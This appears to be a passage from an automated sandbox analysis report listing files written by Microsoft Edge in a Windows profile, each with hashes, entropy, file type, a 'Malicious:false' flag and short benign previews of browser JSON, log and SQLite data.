                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):111
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                                      MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                                      SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                                      SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                                      SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF3225e.TMP (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                      MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                      SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                      SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                      SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:[]

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):36864
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                      MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                      SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                      SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                      SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\c8ac1f37-ef70-425a-b51b-2d5e54253414.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):111
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.718418993774295
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
                                                                                                                                                                                                                                                                                      MD5:807419CA9A4734FEAF8D8563A003B048
                                                                                                                                                                                                                                                                                      SHA1:A723C7D60A65886FFA068711F1E900CCC85922A6
                                                                                                                                                                                                                                                                                      SHA-256:AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
                                                                                                                                                                                                                                                                                      SHA-512:F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\ffc668e6-92b1-4600-bce2-956dbe251806.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                      MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                      SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                      SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                      SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):80
                                                                                                                                                                                                                                                                                      Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                      MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                      SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                      SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                      SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):428
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.234427865207498
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:LXu9+vLZYebvqBZFUt8iXaoJ/+i09V54ZYebvqBaJ:1lYebvyg8FoYebvL
                                                                                                                                                                                                                                                                                      MD5:FD0449DE90134CF49F91DE9D09178994
                                                                                                                                                                                                                                                                                      SHA1:F6AAD049DC4D7A98B49D891BA96B36EE5A8EDF5F
                                                                                                                                                                                                                                                                                      SHA-256:A5001A352274E22900CAF406895E94152D3E4CA088FC4A74350CF1F71966646F
                                                                                                                                                                                                                                                                                      SHA-512:2E998B58D5A541C951A659C3C03555C769F3484C4959F28A47DDB582BC37B46C179C84C5F61279C59A036420175D8B868E8FF4B76DBBFCD0E9DAA5D542370FA5
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:41.025 184c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/27-03:05:41.026 184c Recovering log #3.2024/12/27-03:05:41.030 184c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):428
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.234427865207498
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:LXu9+vLZYebvqBZFUt8iXaoJ/+i09V54ZYebvqBaJ:1lYebvyg8FoYebvL
                                                                                                                                                                                                                                                                                      MD5:FD0449DE90134CF49F91DE9D09178994
                                                                                                                                                                                                                                                                                      SHA1:F6AAD049DC4D7A98B49D891BA96B36EE5A8EDF5F
                                                                                                                                                                                                                                                                                      SHA-256:A5001A352274E22900CAF406895E94152D3E4CA088FC4A74350CF1F71966646F
                                                                                                                                                                                                                                                                                      SHA-512:2E998B58D5A541C951A659C3C03555C769F3484C4959F28A47DDB582BC37B46C179C84C5F61279C59A036420175D8B868E8FF4B76DBBFCD0E9DAA5D542370FA5
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:41.025 184c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/27-03:05:41.026 184c Recovering log #3.2024/12/27-03:05:41.030 184c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):331
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.193184344735284
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:Dyfmt4q2PcNwi23oH+TcwtpIFUt8WyfFtZmw+WyfFfkwOcNwi23oH+Tcwta/WLJ:T4vLZYebmFUt8B/+b54ZYebaUJ
                                                                                                                                                                                                                                                                                      MD5:A0AC030D3BB4E926CC86E52F805F1DED
                                                                                                                                                                                                                                                                                      SHA1:AB3B94FB3EC78AB70847A67741DD642E0892789A
                                                                                                                                                                                                                                                                                      SHA-256:7A604A5A5DEE227E877D24C1ECA36569100CBCF74EA631F3ED893E621E9C3AE6
                                                                                                                                                                                                                                                                                      SHA-512:5EDB3CCD7E5678DDDDF35155C96432F1D9D1B08991DB7872587075EF5C6E56DB22E32BD346C871B7C8FB586E6130B10177F8EDB0C0CBD3C113147FEBC2A76203
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.238 c90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/27-03:05:22.239 c90 Recovering log #3.2024/12/27-03:05:22.239 c90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):331
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.193184344735284
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:Dyfmt4q2PcNwi23oH+TcwtpIFUt8WyfFtZmw+WyfFfkwOcNwi23oH+Tcwta/WLJ:T4vLZYebmFUt8B/+b54ZYebaUJ
                                                                                                                                                                                                                                                                                      MD5:A0AC030D3BB4E926CC86E52F805F1DED
                                                                                                                                                                                                                                                                                      SHA1:AB3B94FB3EC78AB70847A67741DD642E0892789A
                                                                                                                                                                                                                                                                                      SHA-256:7A604A5A5DEE227E877D24C1ECA36569100CBCF74EA631F3ED893E621E9C3AE6
                                                                                                                                                                                                                                                                                      SHA-512:5EDB3CCD7E5678DDDDF35155C96432F1D9D1B08991DB7872587075EF5C6E56DB22E32BD346C871B7C8FB586E6130B10177F8EDB0C0CBD3C113147FEBC2A76203
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:2024/12/27-03:05:22.238 c90 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/27-03:05:22.239 c90 Recovering log #3.2024/12/27-03:05:22.239 c90 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 9, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.265142166671222
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:384:KrJ/2qOB1nxCkMXSAELyKOMq+8HKkjucswRv8p3nVum1:K0q+n0JX9ELyKOMq+8HKkjuczRv895
                                                                                                                                                                                                                                                                                      MD5:7749D35D26380A5605EBD39948BD12CA
                                                                                                                                                                                                                                                                                      SHA1:A694839C1E844DE9DEA58022064A3DFA2FF6B8D5
                                                                                                                                                                                                                                                                                      SHA-256:EFF6E373B3FD123F4B0A64862FF00B0181C7220DD7EC7B635ABF15065902B075
                                                                                                                                                                                                                                                                                      SHA-512:557F7EAF39F3F75FDD2B513C32BEECCFF2856FB82830B8D7A73D40FD269041A7D545294D3762081B85FDFC4754187D3936679FC20DA68506FABF6E4DD49639D8
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.4668568336674349
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcB0kAM9:v7doKsKuKZKlZNmu46yjx0kX9
                                                                                                                                                                                                                                                                                      MD5:2FBB71CE155509767B0EFC0044E4FC17
                                                                                                                                                                                                                                                                                      SHA1:D20864C0897E642364852534889A270D2ADECE03
                                                                                                                                                                                                                                                                                      SHA-256:F006D21C560C67700E008E45B85DCBDE5F772AC9CAAE4334B9E8C686C8272ACC
                                                                                                                                                                                                                                                                                      SHA-512:F1CCBBA73BCAB78FB76D68194312E241871E6408C9D3222B5DC905AD6BBDFCDC249B9BDF61EA3669A14D6FC3EB8576EB46C9310585F36F0799E73AD3FB5C5441
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager-journal

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):12824
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.13690319541285847
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:sd9Nllv/etXlf5Bel7o34//l/h4jRfn1d7jdtQflla6o7l29sXtXlfe:sSlxBem4puj3dndgla6o7kalG
                                                                                                                                                                                                                                                                                      MD5:B2585DE48118C301EA13DD18184C861A
                                                                                                                                                                                                                                                                                      SHA1:552D3EA9AB59F35B30D314B17D4E4968CAF5F4C2
                                                                                                                                                                                                                                                                                      SHA-256:A35FD3BD1DBC4B2A36B0313DEB85F5B0581153D522B0C307D773EBA71E0C1EE1
                                                                                                                                                                                                                                                                                      SHA-512:FCC0C0CFBEC9F6FB0E14ED4EC88753454378E1DC6836DB233D280079613CFF7A6D181F8F73BFA1708B19E0BA7A226A61E37A83900B71FD7427523EF1AD96B6EC
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:............X<.O........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\a139949c-43ec-4b0a-914b-2a4121de1ede.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:.

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\a2df07a5-bbc4-488c-b581-fe50c1b11ebd.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (17666), with no line terminators
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):17668
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.4844859493009634
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:stnJ99QTryDiuabatSuyp8BsIYyaNPOpegzkXMlNsNXphzd8J2w516o8VmbV+Fpx:stnPGQSu48BsIYtJOpnizdgtbbG6QwKl
                                                                                                                                                                                                                                                                                      MD5:306D26E65D2A4DB7BA43F1538CBF7792
                                                                                                                                                                                                                                                                                      SHA1:3005EE713B5774F38D36EDD17A0FEA3584766141
                                                                                                                                                                                                                                                                                      SHA-256:8F8CAA6E760459B6F1950F3328F45E11F9EA274E4FA14B887D603C37AE750171
                                                                                                                                                                                                                                                                                      SHA-512:0A09F4CB96ABB713EA943088DD6954BA9F3AFE3AA509066F830771B13096DBB2CF2C6E5AF94CBD25FA137A8DF0F6D486915BC0D7446CEDC2E0C0C8017F653BDB
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379760322732592","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\a69447b4-5a69-45a8-8e35-bca4f2c68e84.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):9680
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.112583781537505
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:stnkdp8BsIYyaNP9kXOIo8VmbV+Fp4QAXCPSYJ:stnQ8BsIYtJdbG6Q/
                                                                                                                                                                                                                                                                                      MD5:AF13559DB3792877F272DFB0170D6985
                                                                                                                                                                                                                                                                                      SHA1:19AF7DE8B4B0AE12C9951B7DB5E767C4F0664EE6
                                                                                                                                                                                                                                                                                      SHA-256:5B9CE1293A69C58C6F0555E4339916B37E3934AB3C38ED4B112F7303121F24ED
